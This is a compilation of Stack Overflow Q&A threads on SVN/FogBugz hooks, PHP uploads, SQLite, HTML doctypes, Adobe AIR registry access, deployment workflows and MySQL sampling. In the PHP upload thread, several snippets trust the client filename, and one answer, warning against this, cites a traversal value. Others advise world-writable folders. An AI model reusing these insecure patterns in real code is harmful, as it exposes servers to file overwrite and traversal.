bugtraq:url http://[your fogbugz URL here]/default.asp?%BUGID%
bugtraq:warnifnoissue false
*Click "OK"
As Jeff says, you'll need to do that for each working copy, so follow his instructions for migrating the properties.
That's it. TortoiseSVN will now add a link to the corresponding FogBugz bugID when you commit. If that's all you want, you can stop here.
Part 2 - FogBugz
For this to work we need to set up the hook scripts. Basically the batch file is called after each commit, and this in turn calls the VBS script which does the submission to FogBugz. The VBS script actually works fine in this situation so we don't need to modify it.
The problem is that the batch file is written to work as a server hook, but we need a client hook.
SVN server calls the post-commit hook with these parameters:
<repository-path> <revision>
TortoiseSVN calls the post-commit hook with these parameters:
<affected-files> <depth> <messagefile> <revision> <error> <working-copy-path>
So that's why it doesn't work - the parameters are wrong. We need to amend the batch file so it passes the correct parameters to the VBS script.
You'll notice that TSVN doesn't pass the repository path, which is a problem, but it does work in the following circumstances:
*
*The repository name and working copy name are the same
*You do the commit at the root of the working copy, not a subfolder.
I'm going to see if I can fix this problem and will post back here if I do.
Here's my amended batch file which does work (please excuse the excessive comments...)
You'll need to set the hook and repository directories to match your setup.
rem @echo off
rem SubVersion -> FogBugz post-commit hook file
rem Put this into the Hooks directory in your subversion repository
rem along with the logBugDataSVN.vbs file
rem TSVN calls this with args <PATH> <DEPTH> <MESSAGEFILE> <REVISION> <ERROR> <CWD>
rem The ones we're interested in are <REVISION> and <CWD> which are %4 and %6
rem YOU NEED TO EDIT THE LINE WHICH SETS RepoRoot TO POINT AT THE DIRECTORY
rem THAT CONTAINS YOUR REPOSITORIES AND ALSO YOU MUST SET THE HOOKS DIRECTORY
setlocal
rem debugging
rem echo %1 %2 %3 %4 %5 %6 > c:\temp\test.txt
rem Set Hooks directory location (no trailing slash)
set HooksDir=\\myserver\svn\hooks
rem Set Repo Root location (ie. the directory containing all the repos)
rem (no trailing slash)
set RepoRoot=\\myserver\svn
rem Build full repo location
set Repo=%RepoRoot%\%~n6
rem debugging
rem echo %Repo% >> c:\temp\test.txt
rem Grab the last two digits of the revision number
rem and append them to the log of svn changes
rem to avoid simultaneous commit scenarios causing overwrites
set ChangeFileSuffix=%~4
set LogSvnChangeFile=svn%ChangeFileSuffix:~-2,2%.txt
set LogBugDataScript=logBugDataSVN.vbs
set ScriptCommand=cscript
rem Could remove the need for svnlook on the client since TSVN
rem provides as parameters the info we need to call the script.
rem However, it's in a slightly different format than the script is expecting
rem for parsing, therefore we would have to amend the script too, so I won't bother.
rem @echo on
svnlook changed -r %4 %Repo% > %temp%\%LogSvnChangeFile%
svnlook log -r %4 %Repo% | %ScriptCommand% %HooksDir%\%LogBugDataScript% %4 %temp%\%LogSvnChangeFile% %~n6
del %temp%\%LogSvnChangeFile%
endlocal
I'm going to assume the repositories are at \\myserver\svn\ and working copies are all under C:\Projects\
*
*Go into your FogBugz account and click Extras -> Configure Source Control Integration
*Download the VBScript file for Subversion (don't bother with the batch file)
*Create a folder to store the hook scripts. I put it in the same folder as my repositories. eg. \\myserver\svn\hooks\
*Rename VBscript to remove the .safe at the end of the filename.
*Save my version of the batch file in your hooks directory, as post-commit-tsvn.bat
*Right click on any directory.
*Select "TortoiseSVN > Settings" (in the right click menu from the last step)
*Select "Hook Scripts"
*Click "Add" and set the properties as follows:
*
*Hook Type: Post-Commit Hook
*Working Copy Path: C:\Projects (or whatever your root directory for all of your projects is.)
*Command Line To Execute: \\myserver\svn\hooks\post-commit-tsvn.bat (this needs to point to wherever you put your hooks directory in step 3)
*Tick "Wait for the script to finish"
*Click OK twice.
Next time you commit and enter a Bugid, it will be submitted to FogBugz. The links won't work but at least the revision info is there and you can manually look up the log in TortoiseSVN.
NOTE: You'll notice that the repository root is hard-coded into the batch file. As a result, if you check out from repositories that don't have the same root (eg. one on local drive and one on network) then you'll need to use 2 batch files and 2 corresponding entries under Hook Scripts in the TSVN settings. The way to do this would be to have 2 separate Working Copy trees - one for each repository root.
Part 3 - WebSVN
Errr, I haven't done this :-)
From reading the WebSVN docs, it seems that WebSVN doesn't actually integrate with the SVN server, it just behaves like any other SVN client but presents a web interface. In theory then it should work fine with a file-based repository. I haven't tried it though.
A: This answer is incomplete and flawed! It only works from TortoiseSVN to FogBugz, but not the other way around. I still need to know how to get it to work backwards from FogBugz (like it's designed to) so that I can see the revision number a bug is addressed in from FogBugz while looking at a bug.
Helpful URLs
http://tortoisesvn.net/docs/release/TortoiseSVN_en/tsvn-dug-propertypage.html
http://tortoisesvn.net/issuetracker_integration
Set the "Hooks"
*
*Go into your fogbugz account and click Extras > Configure Source Control Integration
*Download "post-commit.bat" and the VBScript file for Subversion
*Create a "hooks" directory in a common easily accessed location (preferably with no spaces in the file path)
*Place a copy of the files in the hooks directories
*Rename the files without the ".safe" extension
*Right click on any directory.
*Select "TortoiseSVN > Settings" (in the right click menu from the last step)
*Select "Hook Scripts"
*
*Click "Add"
*Set the properties thus:
*
*Hook Type: Post-Commit Hook
*Working Copy Path: C:\\Projects (or whatever your root directory for all of your projects is. If you have multiple you will need to do this step for each one.)
*Command Line To Execute: C:\\subversion\\hooks\\post-commit.bat (this needs to point to wherever you put your hooks directory from step 3)
*I also selected the checkbox to Wait for the script to finish...
WARNING: Don't forget the double back-slash! "\\"
Click OK...
Note: the screenshot is different, follow the text for the file paths, NOT the screenshot...
At this point it would seem you could click "Issue Tracker Integration" and select FogBugz. Nope. It just returns "There are no issue-tracker providers available".
*
*Click "OK" to close the whole
settings dialogue window
Configure the Properties
*Once again, right click on the root directory of the checked out project you want to work with (you need to do this "configure the properties" step for each project -- see "Migrating Properties Between Projects" below)
*Select "TortoiseSVN > Properties" (in the right click menu
from the last step)
*Add five property value pairs by clicking "New..." and inserting the following in "Property Name" and "Property Value" respectively:
bugtraq:label BugzID:
bugtraq:message BugzID: %BUGID%
bugtraq:number true
bugtraq:url http://[your fogbugz URL here]/default.asp?%BUGID%
bugtraq:warnifnoissue false
*Click "OK"
Committing Changes and Viewing the Logs
Now when you are commiting, you can specify one bug that the commit addresses. This kind of forces you to commit after fixing each bug...
When you view the log (right click the root of the project, TortoiseSVN > Show log) you can see the bug id that each check-in corresponds to, and you can click the bug id number to be taken to FogBugz to view that bug automatically if you are looking at the actual log message. Pretty nifty!
Migrating Properties Between Projects
*
*Right click on a project that already has the proper Properties configuration
*Select "TortoiseSVN > Properties" (from the right-click menu from step 1)
*Highlight all of the desired properties
*Click "Export"
*Name the file after the property, and place in an easily accessible directory (I placed mine with the hooks files)
*Right click on the root directory of the checked out project that needs the properties set.
*Click "Import"
*Select the file you exported in step 4 above
*Click Open
A: The problem is that FogBugz will link to a web page, and file:///etc is not a web page. To get integration two ways, you need a web server for your subversion repository. Either set up Apache or something else that can host those things the proper way.
A: I am not sure I follow you. Do you have the repositories on the network or on your C:\ drive? According to two of your posts, you have both, or neither, or one of them or...
You can not get VisualSVN or Apache to safely serve repositories from a network share. Since you originally said you had the repositories on your C:\ drive, that's what you get advice for. If you have a different setup, you need to tell us about that.
If you have the repositories on your local harddisk, I would install VisualSVN, or integrate it into Apache. VisualSVN can run fine alongside Apache so if you go that route you only have to install it. Your existing repositories can also just be copied into the repository root directory of VisualSVN and you're up and running.
I am unsure why that big post here is labelled as incomplete, as it details the steps necessary to set up a hook script to inform FogBugz about the new revisions linked to the cases, which should be what the incomplete message says it doesn't do. Is that not working?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3607",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "16"
} |
Q: PHP Error - Uploading a file I'm trying to write some PHP to upload a file to a folder on my webserver. Here's what I have:
<?php
if ( !empty($_FILES['file']['tmp_name']) ) {
move_uploaded_file($_FILES['file']['tmp_name'], './' . $_FILES['file']['name']);
header('Location: http://www.mywebsite.com/dump/');
exit;
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Dump Upload</title>
</head>
<body>
<h1>Upload a File</h1>
<form action="upload.php" enctype="multipart/form-data" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000000" />
Select the File:<br /><input type="file" name="file" /><br />
<input type="submit" value="Upload" />
</form>
</body>
</html>
I'm getting these errors:
Warning: move_uploaded_file(./test.txt) [function.move-uploaded-file]: failed to open stream: Permission denied in E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\upload.php on line 3
Warning: move_uploaded_file() [function.move-uploaded-file]: Unable to move 'C:\WINDOWS\Temp\phpA30E.tmp' to './test.txt' in E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\upload.php on line 3
Warning: Cannot modify header information - headers already sent by (output started at E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\upload.php:3) in E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\upload.php on line 4
PHP version 4.4.7
Running IIS on a Windows box. This particular file/folder has 777 permissions.
Any ideas?
A: As it's Windows, there is no real 777. If you're using chmod, check the Windows-related comments.
Check that the IIS Account can access (read, write, modify) these two folders:
E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\
C:\WINDOWS\Temp\
A: Try adding a path. The following code works for me:
<?php
if ( !empty($_FILES['file']) ) {
    $from = $_FILES['file']['tmp_name'];
    $to = dirname(__FILE__).'/'.$_FILES['file']['name'];
    if( move_uploaded_file($from, $to) ){
        // Redirect before producing any output, or the Location header will fail
        header('Location: http://www.mywebsite.com/dump/');
        exit;
    } else {
        echo 'Failure';
    }
}
?>
A: OMG
move_uploaded_file($_FILES['file']['tmp_name'], './' . $_FILES['file']['name']);
Don't do that. $_FILES['file']['name'] could be ../../../../boot.ini or any number of bad things. You should never trust this name. You should rename the file something else and associate the original name with your random name. At a minimum use basename($_FILES['file']['name']).
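A hedged sketch of that advice (the uploads directory and the naming scheme are assumptions for illustration, not part of the original code):
<?php
if ( !empty($_FILES['file']['tmp_name']) ) {
    // Never trust the client-supplied name; strip any path components
    $original = basename($_FILES['file']['name']);
    // Store under a server-generated name and keep the original name elsewhere
    $safe = uniqid('upload_', true);
    $target = dirname(__FILE__) . '/uploads/' . $safe;
    if ( move_uploaded_file($_FILES['file']['tmp_name'], $target) ) {
        // Record the ($original, $safe) pair in your database here
    }
}
?>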
A: Warning: move_uploaded_file() [function.move-uploaded-file]: Unable to move 'C:\WINDOWS\Temp\phpA30E.tmp' to './people.xml' in E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\upload.php on line 3
is the important line: it says you can't put the file where you want it, and this normally means a permissions problem.
Check that the process running the app (normally the web server's process for PHP) has the rights to write a file there.
EDIT:
Hang on a bit; I jumped the gun a little. Is the path to the file in the first line correct?
A: Another thing to check is your directory separator; you are using / on a Windows box.
A: Add the IIS user to the 'dump' folder's security permissions group, and give it read/write access.
A: Create a folder named "image" with folder permission 777
<?php
move_uploaded_file($_FILES['file']['tmp_name'],"image/".$_FILES['file']['name']);
?>
A: We found that using the path below
$_SERVER['DOCUMENT_ROOT'] . 'path to folder'
and giving everyone full access to the folder resolved the issue.
Make sure not to reveal the location in the address bar. No sense in giving the location away.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3611",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "18"
} |
Q: Using SQLite with Visual Studio 2008 and Silverlight Anyone know a decent way to reference a SQLite database using the above-mentioned tools? I tried using ODBC (the SQLite driver) but while the connection is good, I get no data returned. Like I can't see any tables in Data Connection (VS 2008). Is there a better way?
Edit: corrected typos
A: Joel Lucsy: That implementation of SQLite is a mixed-mode assembly which is not supported by Silverlight. Only a pure managed implementation would work under the Silverlight CLR.
A: Have you tried the ADO driver for SQLite?
There is a great quick start guide (thanks to another thread here) that you can get here:
http://web.archive.org/web/20100208133236/http://www.mikeduncan.com/sqlite-on-dotnet-in-3-mins/
A: The MIT licensed C#-SQLite might be the right solution. It's a complete managed port of SQLite, so it can be used with Silverlight.
A: You should give Siaqodb a try. I haven't tested it, but they mention that it works with Silverlight OOB apps and even give you a tutorial here.
It's commercial software, but a 30 day trial is available.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3615",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: What's the Developer Express equivalent of System.Windows.Forms.LinkButton? I can't seem to find Developer Express' version of the LinkButton. (The Windows Forms linkbutton, not the ASP.NET linkbutton.) HyperLinkEdit doesn't seem to be what I'm looking for since it looks like a TextEdit/TextBox.
Anyone know what their version of it is? I'm using the latest DevX controls: 8.2.1.
A: The control is called the HyperLinkEdit. You have to adjust the properties to get it to behave like the System.Windows.Forms control like so:
control.BorderStyle = BorderStyles.NoBorder;
control.Properties.Appearance.BackColor = Color.Transparent;
control.Properties.AppearanceFocused.BackColor = Color.Transparent;
control.Properties.ReadOnly = true;
A: You should probably just use the standard ASP.Net LinkButton, unless it's really missing something you need.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3625",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: HTML version choice When developing a new web based application which version of html should you aim for?
EDIT:
cool I was just attempting to get a feel from others I tend to use XHTML 1.0 Strict in my own work and Transitional when others are involved in the content creation.
I marked the first XHTML 1.0 Transitional post as the 'correct answer' but believe strongly that all the answers given at that point where equally valid.
A: I'd shoot for XHTML Transitional 1.0. There are still a few nuances out there that don't like XHTML strict, and most editors I've seen now will give you the proper nudges to make sure that things are done right.
A: Transitional flavors of XHTML and HTML are deprecated. They were intended only for old user-agents that don't support CSS. See explanation in the DTD.
W3C advises that you should use Strict whenever possible, and these days it's certainly possible.
Transitional version has already been removed in XHTML/1.1 and HTML5.
XHTML/1.0 has exactly the same elements and attributes (semantics) as HTML4. The XHTML/1.0 specification doesn't even specify any elements! For anything else than syntax, it refers to HTML4.
Additionally, you'll be unable to use any feature of XHTML that is not available in HTML (namespaces, XML DOM) if you send documents as text/html, and unfortunately that is required for compatibility with IE and other HTML-only browsers.
In 2008 the correct choice would be HTML4 Strict:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
but as of 2016, there's only one version of HTML that matters.
<!DOCTYPE html>
A: Dillie-O is right on with his answer of XHTML 1.0 Transitional but I would suggest shooting for XHTML 1.0 Strict and only falling back on Transitional if there's some piece of functionality you absolutely need that Strict is not allowing.
A: @Mike:
While I agree that validity is not needed to make a page render (after all, we have to keep IE6 compatibility in...), creating valid XHTML that IS compatible AND valid is not a problem. The problems start when people are used to HTML 4 and using the deprecated tags and attributes.
Just because the Web is a pile of crap does not mean that every new page needs to be a pile of crap as well. Most Validation errors on SO are so trivial, it shouldn't take too long to fix, like missing quotes on attributes.
But it may still be kind of pointless, given the fact that the W3C does not have any idea where they want to be going anyway (see HTML 5) and a certain big browser company that also makes operating systems does not care either, so a site could just as well send out its doctype as HTML 1337 Sucks and browsers will still try to render it.
A: There are some compelling warnings about the usage of XHTML, primarily centering around the fact that the mime-type for such a document should be sent as:
Content-type: application/xhtml+xml
Yet IE 6 and 7 don't support this, and then websites must send it as:
Content-type: text/html
Unfortunately that method is considered harmful.
Some also bemoan the fact that although the intent of XHTML is to make web pages parsable by an XML parser, it has in practice failed due to incorrect usage on existing websites.
I still prefer to write documents in XHTML 1.0 Strict, mostly because of the challenge, and the cleanliness and error-checking that a validator gives. I enjoy the syntax a bit better, because it forces me to be very explicit about when tags end, etc. For me it's more a personal choice than a purely technical one.
A: HTML 4.01. There is absolutely no reason to use XHTML for anything but experimental or academic problems that you only want to run on the 'obscure' web browsers.
XHTML Transitional is completely pointless even to those browsers, so I'm not sure why anyone would aim for that. It's actually pretty alarming that a number of people would recommend that.
I'd say aiming for HTML 4.01 is the most predictable, but Teifion is right really, "anything that renders your page will do".
in response to Michael Stum:
XHTML is XML based, so it allows easier parsing and you can also use the XML components of most IDEs to programmatically query and insert stuff.
This is certainly not true. A lot of XHTML on the web (if not most) does not conform to XML validity (and it needn't - it's not being sent as XML). Trying to treat this like XML when dealing with it is just going to earn you a lot of headaches. This page on Stack Overflow, for instance, will generate errors with many unforgiving XML tools for having invalid mark-up.
A: Anything that renders your page is will do so regardless of which popular standard you use. XHTML is stricter and probably "better" but I can't see what advantages you will get with one standard over another.
A: Personally, I prefer XHTML 1.0 Transitional.
XHTML is XML based, so it allows easier parsing and you can also use the XML components of most IDEs to programmatically query and insert stuff.
Transitional is not as strict as Strict, which makes it relatively easy to work with, compared to Strict which can often be a PITA. Comparison between Transitional and Strict
1.0 is "more compatible" than 1.1 and 1.1 seems to be still under some sort of development.
A: I aim for XHTML 1.0 Trans. It's better to conform so when bugs are fixed in the browsers you won't suddenly be working against the clock trying to figure out what actually needs changing.
In my opinion 1.1 is borked and 2.0 has been smashed to smithereens: Do I really need/want a header/footer tag?
A: I'm all for XHTML Strict every time. I strongly believe that HTML should be more like XML. It's not hard to validate it if you know XML, and the W3C's validator points you in the right direction anyway.
XHTML 2.0 is heading toward what the W3C has been aiming for for a long time - the semantic web. The best benefit of XHTML 2.0 for me is that every conformant page on the web will be understandable as content, or an article (for that's what pages are - documents) because they all apply to the same standard. You would then be able to construct interpreters (i.e. browsers) that present the content in a completely different manner - there are literally thousands of ideas waiting here.
A: If you want to use XHTML 1.0 in an HTML-compatible way, that's fine. However, do note that the W3C validator and the XHTML DTDs know nothing about mime types and how browsers behave differently (like <map> name/id matching) between them. The DTDs know nothing about how well browsers support certain elements (like <embed> for example) either.
What this means is that the XHTML DTDs and the validator don't reflect reality and trying to conform to them is pointless.
If you want to use XHTML just so you can close certain elements with /> (where html-compatible), just use HTML5 markup (so the browser is in full standards mode). HTML5 allows the use of /> in an HTML-compatible way (the same HTML-compatible way you have to do it when using XHTML 1.0 markup with text/html). Then, just stick to what works (you know better than some DTD) in browsers.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8"/>
<title></title>
</head>
<body>
<p>Line1<br/>Line2</p>
<p><img src="" alt="blank"/></p>
<p><input type="text"/></p>
<p><embed type="application/x-something" src=""/></p>
</body>
</html>
Then, use http://validator.nu/ to make sure it's well formed at least.
A: If you have tools to generate your XHTML like any other XML document, then go with XHTML. But when you just use plain text templates, text concatenation, etc. you are OK with good old HTML 4.01.
Browsers now start to support this 10 year old standard.
Important: Avoid being called a bozo when producing XML
A: I don't think it actually matters whether you use XHTML or plain HTML. The end goal here is to have low maintenance and quick development through a predictable rendering. You can get this from using xhtml or html, as long as you have validating code. I've even heard arguments that it's best to target quirks mode, because new versions of browsers don't change quirks mode, so maintenance is easy.
In the end, it all becomes tag soup, for good reason, because getting web app developers to write error-free html means asking them to write bug-free code. Validators are no help, because they only validate the initial page view. This is also why I've never seen the point in xhtml served as xml for anything beyond static sites. The level of arrogance a web apps developer would need to have to serve up their web app as xml is staggering.
A: HTML 4.0 Strict, or ISO HTML.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3654",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "23"
} |
Q: Can you access the windows registry from Adobe Air? (y/N)
Edit: Read-only access is fine.
A: I haven't tried this yet, but I think I've found a workaround.
Adobe AIR cannot write to Windows Registry, but you can, however, launch a native process in AIR 2. Here's a blog post that shows how to do that: http://www.adobe.com/devnet/air/flex/quickstart/articles/interacting_with_native_process.html
Now, on Windows, you are able to modify the Windows registry with .reg files. .reg files are just plain text files that's read by regedit.exe. So in theory, you can write a .reg file to the file system, then launch regedit.exe with the .reg file passed in and...TADA! You just modified Windows registry from your AIR app!
To read a value, you can use regedit's export function to write to a .reg file and read from that file. Details on regedit's options: http://www.robvanderwoude.com/regedit.php
Here are some additional resources:
.reg file syntax: http://support.microsoft.com/kb/310516
write to file with AIR: http://www.adobe.com/devnet/air/flex/articles/exploring_file_capabilities.html
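Putting the pieces together, a minimal ActionScript sketch of the launch step might look like the following. This is an assumption-laden illustration: it presumes AIR 2+ with the extendedDesktop profile enabled in the application descriptor, that the app already wrote temp.reg to its storage directory, and that regedit lives at the usual Windows path. regedit's /s switch imports silently, without the confirmation prompt.
import flash.desktop.NativeProcess;
import flash.desktop.NativeProcessStartupInfo;
import flash.filesystem.File;

var regFile:File = File.applicationStorageDirectory.resolvePath("temp.reg");

var regedit:File = new File();
regedit.nativePath = "C:\\Windows\\regedit.exe"; // assumed location

var startupInfo:NativeProcessStartupInfo = new NativeProcessStartupInfo();
startupInfo.executable = regedit;

var args:Vector.<String> = new Vector.<String>();
args.push("/s");                  // suppress the "Are you sure?" prompt
args.push(regFile.nativePath);
startupInfo.arguments = args;

var process:NativeProcess = new NativeProcess();
process.start(startupInfo);       // regedit merges the .reg file into the registry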
A: If you're willing to force the user to also install another application, you could write a small C# or C++ Windows service that simply opens a socket that provides some kind of protocol for accessing the registry. Then in AIR you can use the Socket class to send messages to/from the C# service that would return results to the AIR app.
When the app loads you can try to connect to the Socket, and if the connection is rejected you could prompt the user to download/install the service.
As for direct access to the registry I am pretty sure Adobe wouldn't allow that from AIR.
A:
If you can I'd be horrified.
Why would you be horrified?
Air is a desktop platform, and having access to the OS's APIs (such as registry access) makes plenty of sense.
That being said, it isn't supported now (and as Adobe seem to be very Mac-centric, I doubt it will ever be added).
I have settled on grabbing the users name from the name of the user directory
Using File.userDirectory.name will work in most cases, but it seems like a very fragile implementation; it relies on the OS maintaining the convention of naming the directory after the username. I can think of a few possible things that might break it (playing with TweakUI, etc.).
A: Here is a sample of modifying the Windows registry in Adobe AIR using NativeProcess and Python, so you can add, delete, or read keys with only a single line of code!
Download: Adobe Air Registry Modifier on Github
A: Are you trying to determine if the user is an administrator or not?
If so, you could grab the username with "File.userDirectory.name".
And I think to figure out if the user is an administrator you could probably try to access a file that requires administrator privileges (maybe try writing a file to Windows/System32). If the file access fails you could probably assume that the user is under a Limited account.
A: A bit late, but I got a wish from a client to read some values from the registry when the project was almost finished. If there were more of these types of wishes, I would have never choosen AIR. But I found a nice extension from FluorineFx, and by extending it, I can now read string and dword values from the registry. Windows only: http://aperture.fluorinefx.com/
A: You could theoretically modify the actual registry files, but I would highly discourage that idea.
A: Be very careful if you decide to create a socket server that listens for registry commands. You are potentially creating a security hole and users' personal firewalls may get in the way in terms of usability.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3666",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: What is your favorite web app deployment workflow with SVN? We are currently using a somewhat complicated deployment setup that involves a remote SVN server, 3 SVN branches for DEV, STAGE, and PROD, promoting code between them through patches, etc. I wonder what do you use for deployment in a small dev team situation?
A: When I worked in a small dev team (small meaning me, another programmer and the boss), it was quite the chaotic mess. However, we found that assigning a "gatekeeper" type of process worked for us.
The gatekeeper was the person who had done the most work on the app (in this case, i had 2 projects i developed from the ground up, he had like 4).
Basically, whenever he had to work on my projects, he'd notify me that he was doing work; I'd make sure the repository was up-to-date and buildable, then he would pull down, make his changes, then commit. He would inform me when it was done; I would pull down, build and deploy. If there were DB changes, we had a DB Change folder with all the scripts that would correct the DB.
It's obviously got a lot of holes in it, but the process worked for us, and kept us from building over each other.
A: Three branches just sounds like extra work.
Environmental differences can be handled by having different versions of the relevant files in the trunk. i.e. database.yml & database.yml.prod. The deployment process should be environmentally aware and simply copy the per-environment files over the default ones.
A: I haven't had any trouble with the common tags/branches/trunk organization.
General ongoing development happens in trunk.
Maintenance of a release in production happens in the appropriate release branch.
Changes to release branch which are still relevant to trunk are merged.
When a new version is ready for deployment it is tagged from trunk, then a branch is created from that tag. The new release branch is checked out to the server, parallel to the current release. When it's time to switch, the paths are juggled ("mv appdir appdir.old && mv appdir.new appdir").
Developers supporting the production release then svn switch their working copy to the new branch, or do a fresh checkout from it.
A: A simple trunk branch contains the most current code, then cut a branch whenever we go live. This seems to work pretty effectively. You can easily go to the previous branch whenever the current branch that you cut for the live system fails. Also, it is easy to fix bugs on the branch that is currently live, and since the branch effectively dies when you cut a new one, there is only ever 1 real branch you need to work on (and then merge fixes from there to the live branch).
A: trunk for development, and a branch (production) for the production stuff.
On my local machine, I have a VirtualHost that points to the trunk branch, to test my changes.
Any commit to trunk triggers a commit hook that does an svn export and sync to the online server's dev URL - so if the site is stackoverflow.com then this hook automatically updates dev.stackoverflow.com
Then I use svnmerge to merge selected patches from trunk to production in my local checkouts. I have a VirtualHost again on my local machine pointing to the production branch.
When I commit the merged changes to the production branch, again an SVN export hook updates the production (live) export and the site is live!
A: We don't use branches for staging web-related stuff; only for testing experimental things that will take a long time (read: more than a day) to merge back into trunk. The trunk, in 'continuous integration' style, represents a (hopefully) working, current state.
Thus, most changes get committed straight to trunk. A CruiseControl.NET server will automatically update on a machine that also runs IIS and has up-to-date copies of all the extra site's resources available, so the site can be fully, cleanly tested in-house. After testing, the files are uploaded to the public server.
I wouldn't say it's the perfect approach, but it's simple (and thus suitable for our relatively small staff) and relatively safe, and works just fine.
A: Trunk contains the current "primary" development codebase.
A developer will often create an individual branch for any medium to long-term project that could hose the trunk codebase and get in the way of the other devs. When he's complete he'll merge back into trunk.
We create a tagged-release every time we push code to production. The folder in /tags is simply the version number.
To deploy to production we're doing an SVN Export to Staging. When that's satisfactory we use a simple rsync to roll out to the production clusters.
A: I highly recommend the book (currently in rough cuts) Continuous Delivery, which describes a full process for managing software delivery, based on continuous integration principles (among others).
I strongly dislike the branch and merge approach, as it can get very messy, and is pretty wasteful since you end up spending time on activities which don't actually deliver any new value. You've already developed, tested, and fixed your code once, why create a situation (copying the code to another branch) which requires you to redo this work?
Anyway, the way to avoid branching and merging is to build your deployable artefacts from trunk, and promote the built artefacts (rather than source) as it passes test, staging, etc. This way you are 100% sure that the thing you're putting into production is the same thing you've tested.
If you've got different features which may need to be released on different schedules, changing your approach to how you implement (make functionality configurable, or better yet modular) can help you keep a single development trunk.
A: We use release branching - this seems to be more efficient for us than the feature branching we were doing.
Don't make different branches for the different environments.
A: I personally work locally (development), adding/fixing features and when I think it's ready I commit to trunk (production). On production server I just do an svn update.
A: I work with a similar situation to that which you currently have. I was tasked with finding a ‘better’ solution and it ran something along the lines of the following.
The live branch represents the servers in their current state.
Any development work should be done in a branch that is taken from live. This could be a one person half hour job or a year long multi team project. As often as is liked changes to live can be merged into these development branches.
Before a piece of work goes live, changes from live are merged again and it is tagged as a potential release. This release is tested on the staging environment and if it passes testing the new live is taken from the tag.
It is possible to merge several pieces of work into one release if that works better.
This means that it is fairly simple to keep development branches up to date with live and if a piece of work in development is dropped there is minimal tidying up to do.
To change from working on one project to another a developer can simply svn switch their local working environment to a different branch.
One of the problems we have had with the system as you describe is that DEV can get out of date with PROD fairly quickly, so you are not developing against the live and it is not easy to spot cross dependencies until stage. The above solution solves these issues while still remaining fairly lightweight.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3667",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "15"
} |
Q: Distribution of table in time I have a MySQL table with approximately 3000 rows per user. One of the columns is a datetime field, which is mutable, so the rows aren't in chronological order.
I'd like to visualize the time distribution in a chart, so I need a number of individual datapoints. 20 datapoints would be enough.
I could do this:
select timefield from entries where uid = ? order by timefield;
and look at every 150th row.
Or I could do 20 separate queries and use limit 1 and offset.
But there must be a more efficient solution...
A: Michal Sznajder almost had it, but you can't use column aliases in a WHERE clause in SQL. So you have to wrap it as a derived table. I tried this and it returns 20 rows:
SELECT * FROM (
SELECT @rownum:=@rownum+1 AS rownum, e.*
FROM (SELECT @rownum := 0) r, entries e) AS e2
WHERE uid = ? AND rownum % 150 = 0;
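On MySQL 8.0 and later, window functions make the user-variable trick unnecessary. A sketch that keeps the 20-datapoint target from the question (NTILE splits the ordered rows into 20 even buckets and we take one representative per bucket):
SELECT MIN(timefield) AS timefield
FROM (
    SELECT timefield,
           NTILE(20) OVER (ORDER BY timefield) AS bucket
    FROM entries
    WHERE uid = ?
) t
GROUP BY bucket
ORDER BY timefield;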
A: Something like this came to my mind
select @rownum:=@rownum+1 rownum, entries.*
from (select @rownum:=0) r, entries
where uid = ? and rownum % 150 = 0
I don't have MySQL at hand, but maybe this will help ...
A: As far as visualization, I know this is not the periodic sampling you are talking about, but I would look at all the rows for a user and choose an interval bucket, SUM within the buckets and show on a bar graph or similar. This would show a real "distribution", since many occurrences within a time frame may be significant.
SELECT DATEADD(day, DATEDIFF(day, 0, timefield), 0) AS bucket -- choose an appropriate granularity (days used here)
,COUNT(*)
FROM entries
WHERE uid = ?
GROUP BY DATEADD(day, DATEDIFF(day, 0, timefield), 0)
ORDER BY DATEADD(day, DATEDIFF(day, 0, timefield), 0)
Or if you don't like the way you have to repeat yourself - or if you are playing with different buckets and want to analyze across many users in 3-D (measure in Z against x, y uid, bucket):
SELECT uid
,bucket
,COUNT(*) AS measure
FROM (
SELECT uid
,DATEADD(day, DATEDIFF(day, 0, timefield), 0) AS bucket
FROM entries
) AS buckets
GROUP BY uid
,bucket
ORDER BY uid
,bucket
If I wanted to plot in 3-D, I would probably determine a way to order users according to some meaningful overall metric for the user.
A: @Michal
For whatever reason, your example only works when the WHERE clause on @rownum uses a less-than operator. I think when the WHERE filters out a row, the rownum doesn't get incremented, and it can't match anything else.
If the original table has an auto incremented id column, and rows were inserted in chronological order, then this should work:
select timefield from entries
where uid = ? and id % 150 = 0 order by timefield;
Of course that doesn't work if there is no correlation between the id and the timefield, unless you don't actually care about getting evenly spaced timefields, just 20 random ones.
A: Do you really care about the individual data points? Or will using the statistical aggregate functions on the day number instead suffice to tell you what you wish to know?
*
*AVG
*STDDEV_POP
*VARIANCE
*TO_DAYS
A: select timefield
from entries
where rand() <= 0.01 -- will return roughly 1% of rows; adjust as needed.
Not a MySQL expert, so I'm not sure how rand() operates in this environment.
A: For my reference - and for those using postgres - Postgres 9.4 will have ordered set aggregates that should solve this problem:
SELECT percentile_disc(0.95)
